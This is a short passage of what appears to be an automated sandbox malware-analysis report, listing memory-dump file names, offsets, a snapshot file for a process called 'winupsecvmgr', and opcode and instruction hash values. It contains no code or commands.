                                                                                                                                                                                                                                                    • Source File: 0000002F.00000002.3552409768.00007FF7A1EF1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FF7A1EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 0000002F.00000002.3552380059.00007FF7A1EF0000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000002F.00000002.3552448433.00007FF7A1F0B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000002F.00000002.3552766636.00007FF7A2479000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000002F.00000002.3552801299.00007FF7A2482000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000002F.00000002.3552865666.00007FF7A2485000.00000008.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 0000002F.00000002.3552900299.00007FF7A2486000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_47_2_7ff7a1ef0000_winupsecvmgr.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                                                                    • Instruction ID: b31157a78bf4b98e921a766a7413f3f702f31aef975b04f292549332e6073292
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fc9e1e80a9e88cbd31d74ff9d33f509eac08cb26dec99584b05bafd3a36954d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCB0123190E20D94F3013F11D84125873E0AB14751FC24030C80C033B2CEFD54408F30